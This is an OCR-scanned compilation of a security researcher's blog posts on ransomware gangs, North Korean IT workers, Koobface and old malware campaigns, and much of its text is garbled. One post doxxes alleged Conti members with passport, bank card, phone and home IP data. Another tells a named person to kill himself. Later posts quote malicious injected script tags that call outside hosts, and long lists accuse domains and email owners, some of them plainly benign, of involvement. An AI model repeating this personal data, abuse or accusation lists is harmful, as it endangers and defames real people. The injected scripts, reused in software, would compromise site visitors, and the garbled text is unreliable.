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1.1 October 


1.1.1 Upcoming "The Hacker Scene - 1983 - 2023" E-Book (2023-10-03 02:17) 
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Dear blog readers, 


I’m working on a new book. It’s called "The Hacker Scene - 1983 - 2023" where | aim to dazzle 
you as always and as usual with all the juicy technical details that you’re supposedly used to 
by now and will hopefully continue to be. 


| intend to release this throughout the Christmas season online for free on my [2]Archive.org 
account. 


Thank you. 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEhUEFrRzubWM8sj23Dj_4iXp1EomMyrG8QkdNaxXRztx6a0Dg 
0it28Q0p1E64000E1c6ZVtNAI JbPUbxKmyzYCXcNwsAjQVQdbs1VM 
2. https://archive.org/details/@ddanche 
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1.1.2 The Most Innovative Leader in Cyber Security To Watch in 2023 Magazine Edi- 
tion (2023-10-03 02:17) 


Dear blog readers, 
Here’s the original [1]article including the PDF [2]here. 


Thank you. 
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3. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEjiToXM1h6PcBcVJF1IDzN3aivdgz7gz6 1uA8YgyVRtHU3I- 
Wt-90U_zHQcpnXVsMOcJzpj2trfJ-3FbeJ3dBeTXc-P9sfVPYijv 


1.1.3. My First Twitter Space on How | Tracked Down The Conti Ransomware Gang 
Using Real-Time OSINT (2023-10-03 02:17) 


[1] 


© Dancho Danchevy @ Host 


How | Tracked Down the Conti Ransomware Gang 
Using Real-Time OSINT? 


64 tuned in: Sep 29: 25:13 


P Play recording 


Dear blog readers, 


Listen [2]here. 


Enjoy. 


1. https: //blogger . googleusercontent. com/img/b/R29vZ2x1/AVvXsEj eP60kUk0Y36JOOJoKKRd_41baw_foucCMtHvzxm1xYG77. 
j AYKZDKsI-O0P21RrTtSgY2FGCPKuESThOOOqvmG3vS 2ddoGL2wf 8 
2. https://twitter.com/dancho_danchev/status/1707847083900723609 


1.1.4 Me Participating in a Comparative Air Force Research Laboratory Infor- 
mation Directorate Technical Report on Botnets and Malware Detection 
(2023-10-03 02:17) 
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Table 10: Anecdotal cases of malicious domain names detected by Notos and the 
corresponding days that appeared in the public BLs .[1]: hosts-file.net, [2]: 
malwareurl.com, [3] siteadvisor.com, [4] virustotal.com, [5] ddanchey.blogspot.com, [6] 
malwaredomainlist.com. 


Domain Name 


Izwn.in 

3b9.ru 
antivirprotect.com 
Ispeed.info 
spy-destroyer.com 
free-spybot.com 
a3Lat 
gidromash.cn 
iantivirus-pro.com 
ericwanhouse.cn 
1165651291.com 


oO) 


Just came across [2]this. 


Outstanding. 


1. https: //blogger.googleusercontent .com/img/b/R29vVZ2x1/AVVXsEgYCeW7cR7G8£kMc JHiBzJSTYAOxcwxKvFGxX5gE0gmBEi1 
aGpv3B0gYzkz_JHx1Fvv96V1XsfY3MIKzZEYd100nK8PdLWCc1DHVx 
2. https://apps.dtic.mil/sti/pdfs/ADA543919. pdf 


1.1.5 Who Can Assist With My Wikipedia Article Draft Submission? (2023-10-03 02:17) 


Dear blog readers, 


Who can assist with my Wikipedia Article Draft submission [1]here? Thanks. Much appreciated. 


[2] 
1. https://en.wikipedia.org/wiki/Draft:Dancho_Danche 


2. https://blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEjdH0e09f vbd3nmgUF ePwCy0s9jH7YNTHPiDAtUm5 Jtbga7q 
N3poN_nNm56yA1P6h7 yKHeOIbY95QDFbB3 j XRHe2AnULVRgxa0Vk3 


1.1.6 Exposing Bentley and Liam From The Conti/Trickbot Malware Gang 
(2023-10-07 02:24) 
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Member of the hacker group "TRICKBOT" 
(also known as the Wizard Spiders) 
"Ryuk", "Maze", "Conti", "Diavol") 


Account (nickname): liam 


Citizen of the Russian Federation 
Name: KORNEYEV ROMAN VIKTOROVYCH 
Date of birth: September 6, 1995 


A resident of St. Petersburg, Leningrad region of the 
Russian Federation. 

Driver's license: Ne 9906 549881 dated 16.05.2019 
Bank card: 427655005681 1014 Sberbank (RF) 


Mobile phone number: +79 117265801 

Telegram 

Username: @romakorneev (Telegram-ID: 203978435) 
Skype: romankomeev2387 


E-mail address: krvthecreator@gmail.com 
E-mail: roman95@gmail.com 
E-mail: romka95@mail.ru 


Jabber: liam@q3meco3S5auwestmt.onion 
Jabber: LiamNeeson@ jabber.ru 
Jabber: liamliam@xmpp.jp 


Home IP addresses: 
188.243.183.226 
188.243.199.19 


Social networks: 

- https://www.facebook.com/profile.php? id= 100003668932901 
https://www.youtube.com/channel/UCUH8mm WenoKpm3pCQzOPB1 w?view_as=s 
ubscriber, 

- https://www.youtube.com/wwwroman95 

- https://vk.com/id2 3893726 


An image is worth a thousand video. A video (hxxp://youtube.com/watch?v=QwXs _GvsF7M) 
is worth less. 


Sample photos include: 
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[4] 


[5] 


Member of the hacker group "TRICKBOT" 
(also known as the Wizard Spiders) 
"Ryuk", "Maze", "Conti", "Diavol") 


Account (nicknames): bentley / manuel / Max17 / volhvb 


Citizen of the Russian Federation 
Name: Galochkin Maxim Sergeevich 
Date of birth: May 19, 1982 


Identification number: 1901 19506002 

} Passport ofa citizen of the Russian Federation: 
9511766005 dated 08.06.1999 

Registration address: Russian Federation, 
Khakassia, Abakan, st. Kirov, building 80, apt. | 


Mobile phone number: +79 134448958 


Telegram: 

Name: Max The Tester 
Username: @volhvb, 
Telegram id: 32910255 


Jabber: bentley@q3mcco3 Sauwestmt.onion 
Jabber: benalien@xmpp.jp 
Jabber: volhvb@exploit.im 


Social networks: 

- https://twitter.com/volhvb 

- https://facebook .com/1505024528 
- https://vk.com/id520 1387 

- https://volhvb. livejournal.com 


Also check out the following (hxxp://youtube.com/watch?v=eqBJVa89rxE). 


Sample photos include: 
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Stay tuned! 


1. https: //blogger. googleusercontent . com/img/b/R29vZ2x1/AVvXsEgw60RexeNxfPQx34F72GCM_RK8ieCtxiGFrtelcTpx2Uf qf 


DoyOxpuLLF90emqLseojH7CrbSsw-W5HuUg6Z4N1Ro2krvxZisqID 


2. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEiz1HLmFFrcAxRUA1s43600eD8wWB4wBee4cXeLxUE4Ekj2 


17kRkt1UI q9MLCowYL1Ngf 1DqAUTQjP3vygk2kwoQ4L8fLVwAt39U 
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BMUr0UU07_A1zB8 juxNYWCnPyW7ZRUOd2ZnF zi JXSwHSWfX18-qRD 
5. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEggSqQqS2XBGkWnOrVKurZrQk_Wt_OAgCbxRPg3aanpe0Yol 
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1.1.7 Yavor Kolev - Part Four (2023-10-13 19:34) 
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Dear, 


Don’t tell me you got money to buy clothes? Is this a suit? Go grab some decent clothes first 
to begin with then go home and kill yourself. But do it loudly in the toilet but before that take 
a big "your work stuff" so that when we come to visit you we can take a photo of you in all of 
your glory the "your work stuff" part. 


Enjoy! 


1. https: //blogger . googleusercontent .com/img/a/AVvXsEhWyswRa8rRnWV5p0EOLomW j CpcA6Wdctt —ho94f rocxEWkvx7Pkzssee 
2SC1R8z0F 4gnFdQoWkKZHDxBTel X2WzArCBHMLIdGyydr41iVvA99B 


1.1.8 Interrupting the Program to Showcase the BG Dishipts that Kidnapped Me! 
(2023-10-16 20:13) 


An image is worth a thousand words. Law Enforcement is also. These are the dipshits that 
kidnapped me. Period. 
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0. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEg0aqgRJhKJslphqAR1GnYJGOrAy38NrdI0rZAek7L50Gco 
Zagmtyvrz_8pw9d5nik8feVt45q/7tI2txXMs5z13p3_-hGNQK9k4Jdm 
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2. 
1twJBmB7zaq75_oBwYYgopbuTQBM70stwiPxLgxYJ jKQhNH2CeJKdCm 
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1.1.9 Exposing North Korea’s IT Worker’s Eden Programming Solutions WMD- 
Funding IT Services and Solutions Franchise - An Overview (2023-10-22 20:24) 
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Jessus. [2]This [3]just [4]in and | think | "did it" and | might even apply fore the Rewards for 
Justice program second time in a row this time believe it or on North Korea’s WMD program 
in terms of tracking down North Korean IT workers that appear to have launched massive 
domain farms and are actively recruiting in the field of developers and IT workers to build 
mobile applications and web sites where the amount at least according to the U.S Government 
goes to fund their WMD program. 


In this analysis which | did in less than two hours time I'll expose the entire domain portfolio of 
North Korea’s IT workers that are busy franchising across the glove potentially funding North 
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Korea’s WMD program at least according to the U.S Government and will offer in-depth peek 
inside their Internet-connected infrastructure. 


[5] 


THIS DOME 


This domain has been seized by the Federal Bureau of Investigation in accordance 
with a seizure warrant issued by the United States District Court for the Eastern District of 
Missouri as part of a law enforcement action against North Korean Information Technology 
(IT) Workers who used it as a software development and portfolio website to advertise and 
obtain remote IT freelancer jobs using fraudulent identities. 


For additional information on North Korea's use of remote IT workers 
and how to identify them see the following advisories: 


1) Guidance on the DPRK Information Technology Workers — Treasury.gov 


— Enter “North Korean IT Workers Advisory” into any search engine — 
2) Additional Guidance on DPRK IT Workers — PSA at IC3.gov 


>> Report suspicious IT workers to IC3.gov << 


hxxp://edenprogram.com 
eden201621@gmail.com 
eden.company123@gmail.com 
Team 

Alex Banks 

Anastasiia Belenok 

Isaac Hunter 

James Baker 

Mark Rober 

Mason Church 

Tony Stewart 


[6] 
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Alex Banks 
alexbgit80k 


Anastasiia Belenok 


anastas-bel 


Chris B 
chris-bgit 


Eden 
Eden2016 


Isaac Hunter 
ishunter216 


James Baker 
jbaker-git 


Mark Rober 
mark-rober21 


Mason Church 
mehurch21 


Tory Stewart 
tony$2013 


[7] 


[8] 


Follow 


Follow 


Follow 


Follow 


Follor 


Follow 


Follow 


Follow 


Follow 
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[9] 


[10] 
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[11] 


[12] 
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[13] 


VILL LEIS PERU 


|| 


Michael King Nick Abbate Tony Stewart Claude Roberson Tony Freeman 
Lead Developer Lead iOS & Android Full stack Mobile Full stack web ASP.NET & C# 
Developer Developer developer Expert 
Dmitriy Anisimoy Samuel Agrebi Ricardo Salazar David Nash Pedro Ortega 
Senior mobile Senior mobile & Senior UPUX Cryptocurrency Blockchain Expert 
developer web developer Designer developer 


Stanislav 
Cherneha 


[14] 
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27 May 2022 at 7:30 pm 


© H&TK MxopmayWoHHble CHcTemb! & NporpammMupoBaHne 


Bcem gobphila seuepea! 
BoT 4 ONATb HacTan TOT BeYep, Kora NPMLwNa Nopa YATAaTb O NO QAX KOTOphIe HaM 
MHTePeCHbI, 0 KOTOPhIX NPUATHO BCNOMMHaThb. AMeHHO NosTOMy NpogomKaeM 
pyOpuky #BoinyckKHMKM Hale CNeyWanbHocTH. 
KcTaTH, TOUHO 3HaeM, YTO Bhl C HeTePNeHMeM #KeTe HALUMX BEYePHX BbINyCKOB! 
Befjb AM@HHO 3THMM NOgbMi Mbl POpAMMca 4 Cc HeTepneHMemM *KgeM BcTpeyu! He 
3afepoKMBaeMCA MW YATAeM 

1 tak 370 Bbino He O4eHb 4aBHO M4 MbI NOMHMM 3T0ro YenoBeka. BbinycKHMK 2019 
roga Knonos Aptyp. B roghl yuebb! ApTyp 6bin yuaCTHMKOM ONMMNMag 4 KOHKYPCOB 
NO NPOrPaMMMPOBaHHlO MM BCerfa Sal MWan YecTb CNeyManbHocTH 
#UHOPM aU MOHHbIe_CHCTeMbl, 4 BCeM HiDKeropogcKoro 3KOHOMMKO- 
TexHONOrMYeckKoro KONNespKa. 

1 Ha cerogHAWwHiit geHb xKMBeT B HiakHem Hosropoge. 

1 Yuutcr 6 Hipkeropogckom rocygapCTBEHHOM apxMTeKTYPHO-CTPOMTENbHOM 
YHABePCHTeTe, CNEUMaNbHOCTh ‘T1porpaMMHar MHDKeHEPHA’, Sa0UHO. 

! Kak 4 8 rogal yuebb! npogomkaeT paboTaTh NporpaMMlCTOM No yqaneHkKe. 

1 PaGotaet Ha ayTcopce Cc HECKONbKMMM KOMMaHMAMM, TaKMMI4 Kak: 
- The Ready Games (https: //ready.gq/}; 
- Ready Maker; 
- Eden Programming Solutions (https:/fedenprogram.com/}, HO KOMNaHMA BbICTYNaeT 
NOCPeQHMKOM, 4a MpoeKThI Nog NDA; 
- A-Games (https://a-games.fun/}, c KOTOpOM paboTan B nocnegHee BpeMA: ABe Murph! 
Ha MOOMNbHbIe NNAaTpOpMol. 

! Ssbiku nporpaMMMpoBaHi4A KOTOPbIe ACNONbsyeT B paboTe: OCHOBHOM C# M4 java 
407 HanicaHiA MNarMHos ANA ahApoliga, a objective-c nA mnarMHoe Ha ios, Rust. 
Hy HaKOHeY-TO BOCKNMKHeM: Thi 4K NPOTPAMMUCT APTYP Ill 


hxxp://github.com/Eden-programming 
hxxp://github.com/tonyS2013 


hxxp://github.com/mchurch21 


hxxp://github.com/mark-rober21 


hxxp://github.com/jbaker-git 


hxxp://github.com/ishunter216 
hxxp://github.com/Eden2016 
hxxp://github.com/chris-bgit 


hxxp://github.com/anastas-bel 


hxxp://github.com/alexbgit80k 


hxxp://dribbble.com/eden _software 


hxxp://www.guru.com/freelancers/eden-programming-solutions 


Team 
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Michael King 


Nick Abbate 


Tony Stewart 


Claude Roberson 


Tony Freeman 


Dmitriy Anisimov 


Samuel Agrebi 


Ricardo Salazar 


David Nash 


Pedro Ortega 


Stanislav Cherneha 


hxxp://www.linkedin.com/in/michael-moore-682a51189 


Sample photos include: 


[15] 


[16] 
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[17] 


[18] 


Related domains known to have been involved in the campaign include: 


hxxp://kncw.or.kr/ 
hxxp://urbis.com.py/ 
hxxp://www.cijef.com/ 
hxxp://www.mcc-consulting.net/ 
hxxp://www.nanosoft.ae/ 
hxxp://www.nimble-apps.com/ 
hxxp://www.scarletsoftware.com/ 
hxxp://www.seglico.com/ 
hxxp://www.strate.ae/ 


hxxp://www.techsoftco. xyz/ 
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hxxp://www.tekrazor.com/ 
hxxp://www.urbis.com.py/ 
hxxp://www. virtualwarein.com/ 
hxxp://advanzetech.com/ 
hxxp://akubohr.com/ 
hxxp://amsoftwarefactory.com/ 
hxxp://apncoders.com/ 
hxxp://avadhmicrosystem.in/ 
hxxp://bafv.suavilaser.es/ 
hxxp://blis4.co.nz/ 
hxxp://chamados.com.br/ 
hxxp://edenprogram.com/ 
hxxp://finnovion.com/ 
hxxp://ft3.group/ 
hxxp://fts77.ru/ 
hxxp://hasanitsolution.netlify.app/ 
hxxp://informatic.cl/ 
hxxp://letsoft.org/ 
hxxp://manin-hood.com/ 
hxxp://maps.google.com/ 
hxxp://mobicom.io/ 
hxxp://nanosoft.ae/ 
hxxp://opticosenriquehurtado.es/ 
hxxp://palmas.app/ 
hxxp://pbd.co.il/ 
hxxp://ponybelle.com/ 
hxxp://pro-codes.com/ 
hxxp://purpleqube.com/ 
hxxp://rispencerroofing.com/ 
hxxp://springshare.com/ 
hxxp://support.google.com/ 
hxxp://template.wbs-dvp.pro/ 
hxxp://tiiastechsolutions.com/ 
hxxp://to-be-technology.fr/ 
hxxp://translate.google.com/ 
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hxxp://trivamwebsolutions.com/ 
hxxp://tsv.mots.go.th/ 
hxxp://vyzkumne-infrastruktury-test.vm.cesnet.cz/ 
hxxp://www.4dbuilds.co.uk/ 
hxxp://www.advanzetech.com/ 
hxxp://www.asset.org.uk/ 
hxxp://www.calco.dk/ 
hxxp://www.chamados.com.br/ 
hxxp://www.crm-masters.pl/ 
hxxp://www.cybernaptics.mu/ 
hxxp://www.daslos-studios.com/ 
hxxp://www.easypages.url.tw/ 
hxxp://www.emaildoctor.org/ 
hxxp://www.indiamart.com/ 
hxxp://www.informatic.cl/ 
hxxp://www.leoconcept.de/ 
hxxp://www.netsupportsoftware.cl/ 
hxxp://www.olbericsolutions.com/ 
hxxp://www.purpleqube.com/ 
hxxp://www.rfcvela.com/ 
hxxp://www.royalbrokerage.net/ 
hxxp://www.sims.com.br/ 
hxxp://www.toshalinfotech.com/ 
hxxp://www.valueworkx.com/ 
hxxp://www.waynesolutionsinc.com/ 
hxxp://www.zwimbaengineering.com/ 


Related personally identifiable email address accounts known to have been involved in the 
campaign include: 


afahmy[.]pro-codes.com 
henrique.lambert[.]hotmail.com 
saint5121[.]yahoo.com 
fastbone[.]fastmail.net 
itdoonsolutions[.]gmail.com 
meetchristopher[.]gmail.com 
t.oriol[.]Jsalesclic.com 
asauma[. ]tekrazor.com 
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dev[.]nimble-apps.com 
drshmk[.]Jmsn.com 
shuki4tal[.]gmail.com 
t.oriol[.]nimble-apps.com 
yoenis.pantojal[.]gmail.com 
a.fahmy[.]windowslive.com 
kncw[.]chol.com 
asauma99[.]yahoo.com 
ubiktime[.]gmail.com 
t_oriol[.]yahoo.fr 
trivamwebsolutions[.]gmail.com 
afahmyl[.]lymail.com 
rodrigo.madrid.a[.]Jgmail.com 
leogar07[.]gmail.com 
caseraghi[.]gmail.com 
Dinesh[.]INDIAMART.COM 
amine.benabou[.]gmail.com 
purplequbess[.]gmail.com 
skiran.pulidindi[.]gmail.com 
info[.]chinacapital.com 
cassio[.]evolua.com.br 


Related personally identifiable email address accounts known to have been involved in the 
campaign include: 


careers[.]advanzetech.com 
Global-HR[.]advanzetech.com 
contact[.]advanzetech.com 
info[.Jakubohr.com 

info[. Jamsoftwarefactory.com 
pathsoft-support[.]gmail.com 
kottenator[.]gmail.com 
avadhsoft[.]gmail.com 
avadhmicrosystem|[.]gmail.com 
support[.]blis4.co.nz 
suporte[.]chamados.com.br 
hello[.]finnovion.com 
support[.]finnovion.com 
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info[.]fts77.ru 
ventas[.]Jinformatic.cl 
info[.]manin-hood.com 
optical. ]opticosenriquehurtado.es 
info[.]ponybelle.com 
a.fahmy[.]windowslive.com 
hello[.]purpleqube.com 
info[.]rlsoencerroofing.com 
sales[.]springshare.com 
info[.]springshare.com 
support[.]springshare.com 
asxvmprobertest[.]gmail.com 
info[.Jinfinitetiias.com 
contact[.]to-be-technology.fr 
info[.]urbis.com.py 
web[.]vyzkumne-infrastruktury.cz 
kontakt[.]calco.dk 
info[.]demolink.org 
mail[.]demolink.org 
cijef[.]cijef.com 
office[.]crm-masters.pl 
info[.]daslos-studios.com 
support[. ]emaildoctor.org 
sales[.]emaildoctor.org 
info[.]seglico.com 
contacto[.]mcc-cons.com 
contacto[.]mcc-consulting.net 
sales[.]nanosoft.ae 
info[.]nanosoftengineers.com 
info[.]nanosoft.sg 
info[.]midcoKuwait.com 
info[.]facilitazis.com 
enquiry[.]nanosoft.ae 
info[.Jolbericsolutions.com 


info[.]federacioncanariadevela.org 


Info[. ]royalbrokerage.net 
info[.]scarletsoftware.com 
support[.]scarletsoftware.com 
gabriel[.]Jseglico.com 
contato[.]sims.com.br 
corporate[.]strate.ae 
job[.]strate.ae 
privacy[.]strate.ae 
sales[.]tekrazor.com 
contactus[.]toshalinfotech.com 
info[.]virtualwarein.com 
contact[.]virtualwarein.com 
customersuccess[.]waynesolutionsinc.com 
support[.]waynesolutionsinc.com 
privacy[.]demolink.org 
duvida[.]chamados.com.br 
comercial[.]chamados.com.br 
problema[.]chamados.com.br 
outros[.]chamados.com.br 
dpo[.Jevolua.com.br 
suporte[.]evolua.com.br 
info[.]maninhood.com 
info[.]Jinetss.com 
mail[.]Jdemolimk.org 
info[.]demolimk.org 
privacy[.]springshare.com 
jobs[.]springshare.com 


Stay tuned! 
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1.2 November 


1.2.1 Where Is Anton Nikolaevich Korotchenko (AHToH Hukonaesuy KopoTtTueHko) 
Also Known as Koobface Botnet Master KrotReal? - Part Two (2023-11-09 01:07) 
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Facebook's Continued Fight Against Koobface 
by Facebook Secrity om Tuesday, Jancary 17, 2012 at 9:05am 


Tt has almost been a year since we gave you cur last updave on the Koobtface virus. Aer 
more than 3 years and numerocs hours of working cesehy with industry leaders, the securty 
community, and law enforcement. we are pleased to anmounce that Facebook has been free of 
indections fer over 9 months. 


Today, Koobface is still impacting other web properties and continwes to threaten security for 
Internet users across the globe. While we have been able to keep Koobtace off Facebook, we 


won't declare victory against the virus ural ts authors are brought to jestice. We feel x & the 
facebook imterert of everyone online to work with law enforcement and the larger security community to 
iderty the garg and see the ful force of law brought to bear against those who have made 


srliens im B-gcmnee gaint. To this end, we will be sharing cur incelligence with the rem of the 
online securty community in the coming weeks in an effort to rid the Web of this virus forever. 


| Facebook Security's Notes 

Get Notes vie RSS To uphold our comminmert to our users and the security of ther data, Facebook takes a very 
aggrestive approach against security threats ranging fom the most annoying social spam to 
malocous viruses and malware. We have been awarded the largest damages ever under the 
CAN-SPAM Act. and we work with the authorities every single day to identity and prosecute 
wrongdoers. While we work diligently on removing these threats from the ste, our Securty 
Team is only truly satisfied when we can remove these threats fom the Web extirely, As part 
of this continued fight against malware and cybercriminals, we wanted to give you an update 
on the Kooblace virus. 


When Koobface fies: surfaced in 2008, cur team worked noe-stop until we were able to Getect 
the virus, remedate afeced users. and eventually derofy those parties responsible: we have 
been tacking them ever since. We will be sharing this investigation material as well as 
information on how to best defend against the wirus, with the leeger security communty. This 
will becver enable sites still targered by Koobface to more adequately provect ther csers. 


Kooblace was able to generate profit through pay-per-click and traffic referral schemes. After 
insalling malware on a user's device, the Koobface gang was able to redirect the user's raffic 
and, in some cases, rick the user inno paying for fake antivirus software. Koobface was able to 
perform these actions by communicating with a central “Command & Control” serves, which 
Grecned the compromised computers to do the gang's bidding. While we were able to stem the 
spread of the virus using a variety of tools (including our URL blacklist and Scan-And-Repar) 
the "Mechership’ was left ureouched. 


This remained the case unel last March, when Facebook Security was able to perform a 
technical takedown of this “Command & Control” Mothership, And since then we have 
had no new sightings of Kooblace for ower nine moeths and oor teams are working Aaed to 
keep & that way. 


In addition to our work behind the scenes. we have bulk a number of tools that have made our 
security protections some of the best on the Web and have spearheaded numerous user 
education campaigns to make sure that everyone knows how to best protect themselves 
celine. A particular success is the Scan-And-Repair tool we built with McAfee to help our users 
keep ther devices malware-Hee. Also of nove i ou URL blacklist system - 8 core component 
of the Facebook Immune system. This URL blacklist not only procects users from malicious 
URLs that Facebook discovers. but also protects people Som knowe-ted URLs fom all of ou 
eczema! partners. 

Nothing is more important to us than ensuring the security and safety of our users and ther 
data, Thankfully, we aren't in this fight alone: cybersecurity is a shared responsiblity for law 
enforcement, industry and everyone who uses the Internet. We will continue to work with the 
broad securty community and industry leaders. such as McAfee and Micrcsott, We will stay 
firmly comeimed to cur work with law enforcement in stopping these threats and bringing the 
bad guys t© justice. Cybercime involves acd impacts real pecole. and we praise those in the 
securty community for coming together to expose those who have broken the law. We are 
confident that our work in identifying those responsible wil put a signicart dent in ther ability 
to harm those online and lead to a safer ienernat for all. 


To find out more about Koobface please see the lavest New York Times article or vist the 
Facebook Secutty Page. 


Jessus. Just came across this and | decided to elaborate. It’s 2012 and no one is fighting 
[2]Koobface. It’s just me doing research with success at the time. 


If an image is worth a thousand words then check out some of the most recent publicly acces- 
sible photos of Anton Nikolaevich Korotchenko also known as Koobface botnet master KrotReal 
including some sample maps of his latest visits across the globe including possibly the fact 
that he’s visited the United States which is quite a news taking into consideration his online 
activities counting the total number of cities that he has visited internationally up to 65. 


Sample photos include: 
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Stay tuned! 
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1.2.2 The Conti Ransomware Gang (2023-11-14 19:37) 


he 


[1] 


7 


Xe) 


sorte 


An image is worth a thousand words. Video and related images courtesy of the Conti Ran- 


somware Gang is worth more. Go through my original research [2]here and my Conti Ran- 
somware Gang compilation [3]here. 


Sample photos: 
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Stay tuned! 
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1.2.3 The Conti Ransomware Gang - Videos - Part Two (2023-11-16 19:53) 


An image is worth a thousand words. Videos courtesy of the [1]Conti Ransomware gang are 
worth [2]more. Check out the following including my Conti Ransomware Gang research compi- 
lation [3]here. 


Sample videos: 
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Stay tuned! 
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1.2.4 Interrupting the Program to Showcase the BG Dishipts that Kidnapped Me! - 
Part Two (2023-11-24 04:49) 
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An image is worth a thousand words. 
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Sample Facebook accounts: 
https://www.facebook.com/profile.php?id=100005932519460 - NasBnuH Feoprues 
https://www.facebook.com/profile.php?id=100030506870037 - Bacun TayescKu 
Stay tuned! 
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1.2.5 Earning4u Pay Per Install Affiliate Network (2023-11-24 12:13) 


An image is worth a thousand words. 
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We scan our .exe every hour special for you. 
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DO NOT use public AV scanners like VirusTotal. 
We scan our .exe every hour special for you. 
Result: 
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1.2.6 Chimera Botnet (2023-11-24 12:14) 


An image is worth a thousand words. 
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1.2.7 Innovative Marketing Scareware Distributor (2023-11-24 12:14) 


An image is worth a thousand words. 
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1.2.13 Rogue Google AdSense Campaign (2023-11-24 12:15) 
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Google seiseisaaie (Haier) asa 


Doorzoek: © het mternet O pagina’s in het Nederlangs O pagna’s wit Nederiand 


Hot internet Reseltaten 1 - 10 van ceca 1,150,000 voor download winamp tree 
Download Winamp Media Player 5.541 . Download Winamp Media Player ... - [ Vertaal dere pene } Gesponsorde inks 
Download Winamp. The #1 Free Media Player Play your MP3. AAC, MPEG. AVI files. and " 
more, Get tree MP3 songs. videos, skins and plugins. ... 
wow winamp coen/player - 56k - In cache - Gelekwaardige pagna’s Mhouwe on laatste versie 2009 
Excluseve gegarandeerde download 
a M P - MP3. Mi - [ Vertas ¢ pages | winamp.winamp-co com 


sng abe ee otk gr cad tyne GPS ty aga "Download 
Winamp, The #1 Free Mode Pieys ee AAC, MPEG, AVI fles, . 


taster agi 60k n.cac wmaidige pawn” s Meuwste Mp3 Muziek Downloads 
Meat resultaten van www wname com » Snel, Veilig & 100% Legaal 
Muziek. downloadboxx comMip3 
jb if ni - Medi > 
Alles wat u welt veten over Winamp Free! ... Download Winamp Free ... Download Winamp Muziek GRATIS Downloaden 
Download Winamp ora sone eclgee reaper o- Simpel, Makkelgk en Snel 
www gratissotwaresite clwinamp. him « 21k « in cache cljkwaardipe paging’s al je Favonete Muziek Downloaden 


www Grates MuziekDownloaden metimp3 
Winamp Media Player - MP3-speler, Mutimediaspeler. MP3-muziek ... 
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2. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEhqBb9HF9kJ2—-ujR1OMGyOvpnZ2pAN87nJQ16w8ndt7WNxfo 
y_n11QiR831qF5oMg9fTRmfSCsEQvk j OPNw_ZYx8TXp4QiIV-FbePv 


1.2.14 SQL Injection Attack Campaign (2023-11-24 12:15) 
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BEAN - Seattle Cocktail Social <script src=http://yrwap.cnihjs ... 

This site may harm your computer. 

18 Sep 2006 ... <script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script 
src=http:// yrwap.cn/h.js> Photo #2 - (0 comments) ... 

www, beanonline. org/photos. asp?id=293 - Similar 


JAQES - 


BEAN - Seattle Cocktail Social <script src=http://yrwap.cnih js ... 

This site may harm your computer. 

<script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script src=http:// 
yrwap.cn/h.js> Photo #2 - (0 comments). <script src=http://yrwap.cn/h.js> ... 


www. beanonline. org/photos. asp?id=243 - Similar pages - 


Decentxposure :: Thursday/Envy Splitsscript src=http://yrwap.cnih ... 
Temporary Residence Records — 11/12/2008. | almost forgot to mention this at all , and that 


would be a pure tragedy. Thursday is back, and dare | say better... 

www. decentx.com/news.asp?id=617 - 34k - Cached - Similar pages - 

Online Branding Reportsscript src=http://yrwap.cnihjs></script ... 

This site may harm your computer. 

Creating a fabulous, unique product along with a companion, sharp-dressed Web site doesnt 
guarantee success. VVhat good are a product and a site if no one... 

internetviz.e-seminars. bizVVebinar/Booklnformation. asp?ID=7 &source=nslr - 

Similar pages - 


leaf<script src=http:-//yrwap.cnihjs=</script=Products Indianleaf ... 

This site may harm your computer. 

leaf products Catalogs leaf Manufacturer Buyers Manufacturers Suppliers Importers Exporters 
Buyer. 

my.expomarkets. com/catalog-manager/productlist.asp?sscatid=507 - Similar pages - 


ST 1<script src=http-/yrwap.cnihjs></script><script src=http ... 

Satellite Tv charts all over the world fram Asia, Europe, Atlantic and America. Daily updated 
satellite information. 

www.tracksat.com/satellite.asp?satelliteid=154 - 204k - Cached - Similar pages - 


1. https: //blogger . googleusercontent .com/img/b/R29VZ2x1/AVvXsEgS_hvJS-J_x-RlromAx4ir3Nq8V4ayRzie45mp4Jo6qVoSc 
xDk5aPpSIId0jh-GFmG7Z2sPExJI5h_S1jy_d-9Xa01EZ1KKs1100t 


1.2.15 Managed Spam Service (2023-11-24 12:15) 


An image is worth a thousand words. 
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1. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEj-f3U7Fa5xKTrUs- vdGx6n3msoNmblnyfz1cl_oLw7rJX4d 
jUgX31P7zeGCmqpXNpGVROgMX3RX1t cOKY- 1wvFXG57B888hfrikzR 


1.2.16 EyeWonder iFrame Injection Attack Campaign (2023-11-24 12:15) 


An image is worth a thousand words. 
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<hase href="http://www.eyevonder.com/" /><meta http-equiv="content-type” content="text/html; charset=utf-5" 
<iw= Post Clack Tracking Location: EyeWonder_HomePage EyeWonder_HomePage --> 

<script type="text/javascript"> 

<!-- 

var dd = new Date(): 

var ord = Math.round(Math.abs(Math.sin(dd.getTime () ) } *1000000000) * 10000000; 

var fd_pet_sre © new String("<scer"+"ipt sro#\"http://adsfac.us/pct_mx.asp?L*235288 csource=jssord="+tord+"\" t 
document.write (fd pet src); 

--> 


</script> 
<noscript> 
frame frameborder 


</noscript 


<!-- END --> 
<!DOCTYPE html PUBLIC “=//W3SC//DTD XHTML 1.0 Transitional//EN" "http: //www.w3.org/TR/xhtmli/DTD/xhtmli-trans 


<html sonlnse"http://uvy.v3.org/1999/xhtml"> 


<head> 

<meta http-equiv="Content-Type” content="text/html: charset=iso-8859-1" /> 

<!-- <meta http-equive"Content-Type" content="text/html; charset=utf-8" /> --> 

<TITLE>EyeVonder :: Interactive Digital Advertising, Rich Media Ads, Video Ads, Flash Ads, Online Advervtisin 


ancta name*"keyvords” content*"ecye vonder, eyewonder, cye-wonder, ivonder, rich, media, richmedia, rich medi 
<meta name="description” content="EyeVonder is Interactive Digital Advertisinglis fastest-groving innovator, 
<META HAME="PUBLISHER” CONTENT="EyeWonder Inc."> 

<META MAME="COPYRIGHT” CONTENT="Copyright 2008 by EyeVonder Inc.”> 

<META NAME*"REVISIT-AFTER” CONTENT*"7 days”> 

